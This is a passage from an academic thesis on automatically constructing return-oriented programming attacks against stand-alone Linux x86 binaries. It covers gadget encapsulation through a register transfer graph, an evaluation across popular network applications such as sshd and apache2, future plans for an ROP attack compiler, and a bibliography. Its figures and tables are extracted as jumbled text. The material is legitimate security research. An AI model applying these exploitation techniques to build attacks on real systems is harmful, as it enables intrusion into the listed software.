Input: start vertex v , stack S and graph G = (V ,E)v.i ndex ← i ndexv.lowli nk ← i ndexi ndex ← i ndex +1S.push(v)for (v, w) ∈ E do

if w.i ndex is undefined thenTar j an(w)v.lowli nk ← mi n(v.lowli nk, w.lowli nk) w ∈ Sv.lowli nk ← mi n(v.lowli nk, w.i ndex)

end ifend forif v.lowli nk = v.i ndex then

repeatstart a new strongly connected componentw ← S.pop()add w to current strongly connected component

until w = voutput the current strongly connected component

end if

to take this case into consideration. Once memory is used to pass data from one

register to the other, it is written in a know location, reserved in the data segment of

the process image.

4.7 Encapsulation

The biggest challenge in chaining the gadgets is taking into consideration every side

effect and ensuring deterministic state in CPU registers, stack and memory. As the

registers get clobbered even by a simple data movement, it is very difficult to keep the

state of the system in the registers. Instead we propose a method to maintain the state

in the main memory. This section express the genuine potency of the register transfer

graph and uses it extensively.

As already shown, the data section has constant offsets, and this can be used as a

place to maintain the state of our system. Once we have found the register candidates

set, we consider the gadgets operating on memory operands and register candidates.

Each of this gadget is then encapsulated with gadgets from the RTG to ensure that the

operation performed in the initial gadget, reads input from memory, and writes the

38

4.7. Encapsulation

result back in memory. The RTG provides gadgets such that:

• Read data from memory, by finding the shortest paths from a memory node to

the source and target operand of the gadget being encapsulated.

• Write data to memory, by finding the shortest path from the target operand of

the gadget being encapsulated, to a memory node.

The encapsulation process can provide mechanism to create virtual registers that

reside in the data section. As the used gadgets only clobber the CPU register, and

also reserved addresses in the data section, each use of the encapsulated gadgets will

only modify the value on the virtual registers. Furthermore, the use of encapsulation

requires only one gadget available for each instruction, to encapsulate it to work with

any memory locations. We call the encapsulated gadgets virtual instructions.

In order to illustrate gadget encapsulation, we assume that the attack application is

Pidgin, and that the RTG is already generated, as shown in Figure 4.8. Furthermore

we assume that addition should be performed on two numbers available in the data

section (2 and 3) and stored to another location. Finally we also assume that only one

add gadget is available:

0xb92689782: add %ebp, %ebx; ret;

0xb92689782: add ebp, ebx ret

eax

ebp

mov

esi

mov

ecx

mov [esi,edi,]

edx

mov

eax

mov

ebx

xchg

esp

mov

xchg

mov [ebp,]

edi

mov [ebp,edi,] xchg

al

mov

cl

mov [ebx,]

edx

mov

2

3

Data Segment

Figure 4.8: Initial state

Figures 4.9 shows how operands ebp and ebx are loaded through the use of RTG, by

reading data from memory referenced by eax.

39

Chapter 4. Automatic Return Oriented Programming

0xb92689782: add ebp, ebx ret

eax

ebp

mov

esi

mov

ecx

mov [esi,edi,]

edx

mov

eax

mov

ebx

xchg

esp

mov

xchg

mov [ebp,]

edi

mov [ebp,edi,] xchg

al

mov

cl

mov [ebx,]

edx

mov

2

3

Data Segment

0xb92689782: add ebp, ebx ret

eax

ebp

mov

esi

mov

ecx

mov [esi,edi,]

edx

mov

eax

mov

ebx

xchg

esp

mov

xchg

mov [ebp,]

edi

mov [ebp,edi,] xchg

al

mov

cl

mov [ebx,]

edx

mov

2

3

Data Segment

Figure 4.9: Read from memory to ebp and ebx

Once the data is loaded into the gadget operands, the add gadget can be executed. The

result stored in ebx is then transferred back to memory, using the RTG and referencing

ecx (Figure 4.10).

The product of the encapsulation is the virtual instruction. It is represented as an

interleaved list of gadget addresses and values. This list is consisted of three parts:

addresses of the gadgets corresponding to the edges along the shortest path from

memory node to the source operands of the encapsulated gadget; the address of

the encapsulated gadget; and addresses of gadgets corresponding to edges along the

shortest path from the target operand in the encapsulated gadget to a memory node.

40

4.7. Encapsulation

0xb92689782: add ebp, ebx ret

eax

ebp

mov

esi

mov

ecx

mov [esi,edi,]

edx

mov

eax

mov

ebx

xchg

esp

mov

xchg

mov [ebp,]

edi

mov [ebp,edi,] xchg

al

mov

cl

mov [ebx,]

edx

mov

2

5

3

Data Segment

Figure 4.10: Write the result back to memory

41

5 Evaluation

To evaluate our approach for automating return oriented programming attacks, we

used OpenSUSE Linux 11.4 (x86), having W⊗

X and ASLR enabled. ROP attacks

are usually conducted on vulnerable applications, by taking over the control of a

computer from another host - remote exploitation. Therefore the executables chosen

for the evaluation, are primary popular network applications, available in almost all

Linux distributions. A set of 20 applications is compiled, ranging from 10 KB to 50 MB.

The first investigated metric is the count of register candidates, i.e. the strongly

connected component cardinality (SCCC) of the RTG. The graph available at Figure 5.1

shows that the count of register candidates increases as the size of the binary increases.

It also indicates that many popular 32bit Linux x86 servers and clients already provide

set of at least 3 available registers, in many cases sufficient to build ROP attacks.

cupsd

5yast2

amarok

skype

3.227 x 10KBvlc

acroread

1

8

5.325 x 10KB

5.939 x 100KB

1.228 x 10KB

4.915 x 10KBfirefox

8

Size (b)

master

4.055 x 100KB

1

opera

1.147 x 10KB

2.589 x 1MB

2.143 x 10MB

0

mysqld

7

5.396 x 10MB

6.963 x 10KB

1.987 x 1MB

1.017 x 10MB

82.393 x 10MB

0

smbd

3

4

4.342 x 100KB5.407 x 100KB

avahi

8

3

2

5

7.004 x 1MB

SCCC

pidgin

1.706 x 10MB

dhclient 6

Binary

3

filezillaXorg

1.761 x 1MB

chrome

apache2

8

8

rpcbind

sshd

8

1.049 x 1MB

Binary Section Size

Avai

labl

e x8

6 C

PU R

egis

ters

0

2

4

6

8

● ●●

● ● ● ● ● ● ●

104.5 105 105.5 106 106.5 107 107.5

Figure 5.1: Number of CPU candidates increases with the size of the binary

43

Chapter 5. Evaluation

In Figure 5.2, we compare the set of register candidates with the fixed set of registers

(eax, ecx and edx) used in the generation of ROP based kernel rootkits [19]. The results

of our approach show that the set of register candidates changes on different binaries,

making it infeasible to use fixed set of registers candidates to perform automatic

construction of ROP attacks.

Binary SCCC FSR Binary SCCC FSRchrome 8 X yast2 4 ×acroread 8 X sshd 5 ×skype 8 X cupsd 3 ×opera 8 X apache2 3 ×smbd 8 X avahi 3 ×mysqld 8 X amarok 0 ×filezilla 8 X rpcbind 2 ×Xorg 7 X firefox 1 ×dhclient 6 × master 0 ×pidgin 5 × vlc 1 ×

Figure 5.2: Register candidates and feasibility with fixed set of registers

The number of register candidates only suggests that a high number of register candi-

dates, will make the process of gadget chaining feasible. In order to evaluate the level

of automicity of gadget chaining, we evaluate which logical, arithmetic, comparison

and control flow modification gadgets can be encapsulated, as shown on Figure 5.3.

add sub inc dec and or xor not neg jmp test cmp Otheracroread X X X X X X X X X X X X call mul shl

shr rol rorskype X X X X X X X callopera X X X X X X X X X X X X call mul shl

shr rol rorsmbd X X X X X X X X X X X X callmysqld X X X X X X X X X X X X call mul shl

shr rol rorfilezilla X X X X X X X X X X X X callXorg X X X X X X X X X X X calldhclient X X X X X X X X X X X callpidgin X X X X X X X X X X X callyast2 X X X X X X X X X X X call shl shr

rol rorsshd X X X X X X X X X Xcupsd X X X X X X X X X X callapache2 X X X X X X X X X callavahi X X X X X X X X callamarokrpcbind X X Xfirefox X X X Xmaster Xvlc X X

Figure 5.3: Encapsulation on different instructions

The check mark in every cell above indicates that a particular instruction can be

encapsulated into a virtual instruction. The results confirm that almost any binary

above 400 KB can provide sufficient set of virtual instructions to build a ROP attack.

44

6 Conclusion

6.1 Contribution

Return Oriented Programming is an interesting and a crowded research area, where

new techniques are continuously explored to increase the level of sophistication and

automation of computer attacks. Chapter 2 gives an overview on the fundamentals

of the ROP technique, its variations, and provides an in-depth practical example of

a ROP attack. We showed that most of the known defence techniques either do not

provide a full protection against all ROP variations, or are not vastly deployed, leaving

software across different architectures vulnerable against this type of attacks.

Our contribution is developing techniques to automatize the process of creating ROP

attacks within stand-alone binaries on Linux (x86) systems. The related work (Chapter

3) indicates that most of the techniques target shared libraries, or operating systems

kernels, where large number of gadgets are on disposal. We have discussed that this

approach is not applicable on stand-alone binaries in Chapter 4, as a result of the

reduced set of gadgets available in the machine code of the stand-alone executables.

Therefore we proposed methods to automatically generate virtual instructions, by

encapsulating gadgets with extra instructions such that they operate on memory loca-

tion, instead of registers or the stack. We carefully took into consideration each side

effect caused by the use of the available gadgets having single or multiple instructions,

guaranteeing that the generated virtual instructions will handle all potential side-

effects. We have built the encapsulation process using a register transfer graph, used

to analyse the data movements between the CPU registers and the memory, ensure

that the user will be able to read from memory, perform an arbitrary operation and

write the result back to memory. Finally (Chapter 5 we have shown that this approach

is able to encapsulate most of the arithmetic and logic instructions, as well as control

flow and comparison instructions, in most cases sufficient to create a ROP attack.

45

Chapter 6. Conclusion

6.2 Future Work

To give a short insight in the future plans, we classify our ideas in two parts: points

that will be in our focus in the short run, and goals that we aim to investigate in the

long run.

In the short run:

• Currently the system lacks a proper mechanism to provide automatic condi-

tional branching. This is due to the fact that conditional branching is usually

done by exploiting the CF flag, to provide comparison of the type a < b. The

system should be extended to support gadget chaining to perform conditional

jumping and automatic calculation of the jump offsets when virtual instructions

are used.

In the long run:

• While most of the related work concentrates on providing a Turing complete

set of instructions, our approach tries to encapsulate as many operations as

possible, without even considering the Turing completeness. The fact that the

result of this method is providing virtual instructions and virtual registers, it

provides the flexibility to incorporate different models of Turing completeness,

abstracted on the level of virtual instructions. This is especially useful once

particular virtual instruction is not available, since the system can still ensure

Turing completeness by choosing different or less complicated model.

• Being able to provide virtual instructions and virtual registers (located in the

memory), the system is potentially able to implement even virtual stack, and

implement wrappers for simplified function call in the ROP attack.

• Finally the ultimate use case of this work would be creating a compiler able to

create fully automatic ROP attacks for an arbitrary code, written in a dedicated

language. This compiler will ideally use the virtual instructions, registers and

stack, as an assembly abstraction to compile the dedicated language into an

attack payload.

46

Bibliography

[1] H. Shacham, “The geometry of innocent flesh on the bone: return-into-libc

without function calls (on the x86),” in ACM Conference on Computer and Com-

munications Security, pp. 552–561, 2007.

[2] E. Buchanan, R. Roemer, H. Shacham, and S. Savage, “When good instructions

go bad: generalizing return-oriented programming to RISC,” in ACM Conference

on Computer and Communications Security, pp. 27–38, 2008.

[3] T. Kornau, “Return Oriented Programming for the ARM Architecture,” Master’s

thesis, University Ruhr Bochum, December 2009.

[4] A. Francillon, D. Perito, and C. Castelluccia, “Defending embedded systems

against control flow attacks,” in Proceedings of the first ACM workshop on Secure

execution of untrusted code, SecuCode ’09, (New York, NY, USA), pp. 19–26, ACM,

2009.

[5] F. Lindner, “Router exploitation,” tech. rep., Recurity Labs, 2008. http://www.

recurity-labs.com/content/pub/FX_Router_Exploitation.pdf.

[6] S. Checkoway, A. J. Feldman, B. Kantor, J. A. Halderman, E. W. Felten, and

H. Shacham, “Can dres provide long-lasting security? the case of return-oriented

programming and the avc advantage,” in Proceedings of EVT 2009, (Montreal,

Canada), USENIX/ACCURATE, USENIX/ACCURATE, July 2009.

[7] P. Team, “PaX non-executable pages design & implementation,” 2005. http:

//pax.grsecurity.net/docs/noexec.txt.

[8] PaX Team, “PaX address space layout randomization,” 2003. http://pax.grsecurity.

net/docs/aslr.txt.

[9] I. Molnar and A. van de Ven, “New Security Enhancements in Red Hat Enterprise

Linux v.3, update 3,” 2004. http://www.redhat.com/f/pdf/rhel/WHP0006US_

Execshield.pdf.

47

Bibliography

[10] J. Li, Z. Wang, X. Jiang, M. C. Grace, and S. Bahram, “Defeating return-oriented

rootkits with "return-less" kernels,” in EuroSys, pp. 195–208, 2010.

[11] J. Jiang, X. Jia, D. Feng, S. Zhang, and P. Liu, “Hypercrop: a hypervisor-based

countermeasure for return oriented programming,” in Proceedings of the 13th

international conference on Information and communications security, ICICS’11,

(Berlin, Heidelberg), pp. 360–373, Springer-Verlag, 2011.

[12] L. Davi, A.-R. Sadeghi, and M. Winandy, “ROPdefender: a detection tool to defend

against return-oriented programming attacks,” in ASIACCS, pp. 40–51, 2011.

[13] K. Onarlioglu, L. Bilge, A. Lanzi, D. Balzarotti, and E. Kirda, “G-free: defeating

return-oriented programming through gadget-less binaries,” in ACSAC, pp. 49–58,

2010.

[14] M. Abadi, M. Budiu, U. Erlingsson, and J. Ligatti, “Control-flow integrity prin-

ciples, implementations, and applications,” ACM Trans. Inf. Syst. Secur., vol. 13,

pp. 4:1–4:40, Nov. 2009.

[15] T. Bletsch, X. Jiang, and V. Freeh, “Mitigating code-reuse attacks with control-

flow locking,” in Proceedings of the 27th Annual Computer Security Applications

Conference, ACSAC ’11, (New York, NY, USA), pp. 353–362, ACM, 2011.

[16] E. J. Schwartz, T. Avgerinos, and D. Brumley, “Q: Exploit hardening made easy,”

in Proceedings of the USENIX Security Symposium, 2011.

[17] M. Tran, M. Etheridge, T. Bletsch, X. Jiang, V. Freeh, and P. Ning, “On the expres-

siveness of return-into-libc attacks,” in 14th International Symposium on Recent

Advances in Intrusion Detection (RAID 2011), 2011.

[18] T. Dullien, T. Kornau, and R.-P. Weinmann, “A framework for automated

architecture-independent gadget search,” in Proceedings of the 4th USENIX con-

ference on Offensive technologies, WOOT’10, (Berkeley, CA, USA), pp. 1–, USENIX

Association, 2010.

[19] R. Hund, T. Holz, and F. C. Freiling, “Return-oriented rootkits: Bypassing kernel

code integrity protection mechanisms,” in USENIX Security Symposium, pp. 383–

398, 2009.

[20] E. Levy (Aleph One), “Smashing the stack for fun and profit,” tech. rep., Phrack

49, 1996. http://insecure.org/stf/smashstack.html.

[21] Anonymous, “Once upon a free()...,” tech. rep., Phrack 57, 2001.

http://www.phrack.org/archives/57/p57_0x09_Once%20upon%20a%20free()_

by_anonymous%20author.txt.

48

Bibliography

[22] Blexim, “Basic integer overflows,” tech. rep., Phrack 60, 2002. http://www.phrack.

org/archives/60/p60_0x0a_Basic%20Integer%20Overflows_by_blexim.txt.

[23] G. Richarte and R. Quesada, “Advances in format string exploitation,” tech. rep.,

Phrack 59, 2001. http://insecure.org/stf/smashstack.html.

[24] J. P. Anderson, “Computer Security Technology Planning Study,” vol. 2, p. 61,

1972.

[25] J. Dressler, Cases and Materials on Criminal Law. West, fifth ed., 2009.

[26] T. Lopatic, “Vulnerability in NCSA HTTPD 1.3,” tech. rep., 1995.

http://web.archive.org/web/20070901222723/http://www.security-express.

com/archives/bugtraq/1995_1/0403.html.

[27] R. Wojtczuk, “Defeating solar designer’s non-executable stack patch,” tech. rep.,

1998. http://insecure.org/sploits/non-executable.stack.problems.html.

[28] N. Smith, “Smashing the Stack: prevention?,” tech. rep., 1997. http://seclists.org/

bugtraq/1997/Apr/125.

[29] J. McDonald, “Defeating Solaris/SPARC Non-Executable Stack Protection,” tech.

rep., 1999. http://www.thc.org/root/docs/exploit_writing/sol-ne-stack.html.

[30] L. Granquist, “Future of buffer overflows ?,” tech. rep., 2000. http://seclists.org/

bugtraq/2000/Nov/13.

[31] R. Wojtczuk, “The advanced return-into-lib(c) exploits,” tech. rep., Phrack 58,

1998. http://phrack.org/issues.html?issue=58&id=4.

[32] R. Permeh and M. Maiffret, “ANALYSIS: .ida “Code Red” Worm,” tech. rep.,

Phrack 58, 2001. http://www.eeye.com/Resources/Security-Center/Research/

Security-Advisories/AL20010717.

[33] S. Krahmer, “x86-64 buffer overow exploits and the borrowed code chunks ex-

ploitation technique,” tech. rep., SUSE, 2005. http://www.suse.de/~krahmer/

no-nx.pdf.

[34] S. Checkoway, L. Davi, A. Dmitrienko, A.-R. Sadeghi, H. Shacham, and

M. Winandy, “Return-oriented programming without returns,” in ACM Con-

ference on Computer and Communications Security, pp. 559–572, 2010.

[35] T. K. Bletsch, X. Jiang, V. W. Freeh, and Z. Liang, “Jump-oriented programming: a

new class of code-reuse attack,” in ASIACCS, pp. 30–40, 2011.

49

Bibliography

[36] K. Lu, D. Zou, W. Wen, and D. Gao, “Packed, printable, and polymorphic return-

oriented programming,” Management, 2011.

[37] R. Roemer, E. Buchanan, H. Shacham, and S. Savage, “Return-oriented program-

ming: Systems, languages, and applications,” Trans. Info. & Sys. Sec., 2011. To

appear.

[38] Microsoft, “A detailed description of the Data Execution Prevention (DEP) feature

in Windows XP Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows

Server 2003,” 2006. http://support.microsoft.com/kb/875352.

[39] H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh, “On the

effectiveness of address-space randomization,” in ACM Conference on Computer

and Communications Security, pp. 298–307, 2004.

[40] P. Barham, B. Dragovic, K. Fraser, S. Hand, T. Harris, A. Ho, R. Neugebauer, I. Pratt,

and A. Warfield, “Xen and the art of virtualization,” SIGOPS Oper. Syst. Rev., vol. 37,

pp. 164–177, Oct. 2003.

[41] N. Nethercote, Dynamic binary analysis and instrumentation. PhD thesis, Uni-

versity of Cambridge, 2004.

[42] M. Frantzen and M. Shuey, “Stackghost: Hardware facilitated stack protection,”

in Proceedings of the 10th conference on USENIX Security Symposium - Volume

10, SSYM’01, (Berkeley, CA, USA), pp. 5–5, USENIX Association, 2001.

[43] U. Erlingsson, S. Valley, M. Abadi, M. Vrable, M. Budiu, and G. C. Necula, “Xfi:

software guards for system address spaces,” in Proceedings of the 7th USENIX

Symposium on Operating Systems Design and Implementation - Volume 7, OSDI

’06, (Berkeley, CA, USA), pp. 6–6, USENIX Association, 2006.

[44] S. Mccamant, “Efficient, verifiable binary sandboxing for a cisc architecture,”

tech. rep., MIT Computer Science and Artificial Intelligence Laboratory, 2005.

[45] F. Mavaddat and B. Parhami, URISC: the Ultimate Reduced Instruction Set Com-

puter. Research report // Faculty of Mathematics, University of Waterloo, Fac. of

Mathematics, Univ., 1987.

50